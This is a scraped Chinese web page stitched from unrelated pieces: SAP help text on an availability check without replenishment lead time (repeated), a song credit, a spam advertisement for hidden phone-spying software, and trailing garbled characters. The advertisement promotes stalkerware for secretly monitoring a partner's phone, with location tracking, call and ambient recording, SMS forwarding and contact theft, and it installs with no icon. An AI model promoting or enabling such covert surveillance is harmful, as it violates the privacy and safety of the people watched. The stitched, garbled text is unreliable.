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不考虑补货提前期的可用性检查Indicates whether, during the availability check, the system checks the replenishment lead time .UseItems for which the delivery date falls within the replenishment lead time, but for which there is no inventory, are confirmed for delivery after the replenishment lead time. In the case of items for which the delivery date falls after the end of the replenishment lead time, the system assumes that everything can be /confirm/ied.ProcedureIn the standard version, leave this field blank if you want the system to check the replenishment lead time.DependenciesIf you want the system to check the replenishment lead time, you should make sure that you have entered a value in at least one of the following three fields in the material master: GR (goods receipt) processing time (Purchasing view) Planned delivery time (MRP I view) GR processing time (MRP II view)Otherwise, the system confirms every requirement. 查看原帖>>记得采纳啊。


不考虑补货提前期的可用性检查Indicates whether, during the availability check, the system checks the replenishment lead time .UseItems for which the delivery date falls within the replenishment lead time, but for which there is no inventory, are confirmed for delivery after the replenishment lead time. In the case of items for which the delivery date falls after the end of the replenishment lead time, the system assumes that everything can be /confirm/ied.ProcedureIn the standard version, leave this field blank if you want the system to check the replenishment lead time.DependenciesIf you want the system to check the replenishment lead time, you should make sure that you have entered a value in at least one of the following three fields in the material master: GR (goods receipt) processing time (Purchasing view) Planned delivery time (MRP I view) GR processing time (MRP II view)Otherwise, the system confirms every requirement.。


原唱:Frankmusik - Wrecking Ball






讼脸B 让永远逃不出你的手掌心,他的一举一动你都了如指掌,看看你心爱的他有没有对你撒谎,是不是在欺骗你 官网可以试用 详细资料 69手机软件网 先试用后购买 淘宝交易 1、换卡通知:手机换卡后自动用新卡向主控手机发送通知短信。

2、手机定位:收手主控手机定位命令后,返回定位经纬度信息可配合地图查看手机所在位置。 3、通话录音:所有的电话都可以录音上传到网站上。

4、回传通信录:将被手机上的通信录以短信回传到主控手机上。 5、转发短信:将收到的短信抄送一份到主控手机。

6、环境录音:发送一条短信就可以开启录音,记录周围情况。 !!!安装方式!!! 像安装普通程序一样安装,注意:安装后是没有图标的,也没有界面! 先试用一天在购买 官网:XSI。

http://1cc.cc/zq 呵呵 2012-6-10 19:12:37K颁熬联锅启暴翘铆钦摧oPJJ 2012-6-10 19:12:37R骚r其撇共引锤Zs睦贰。

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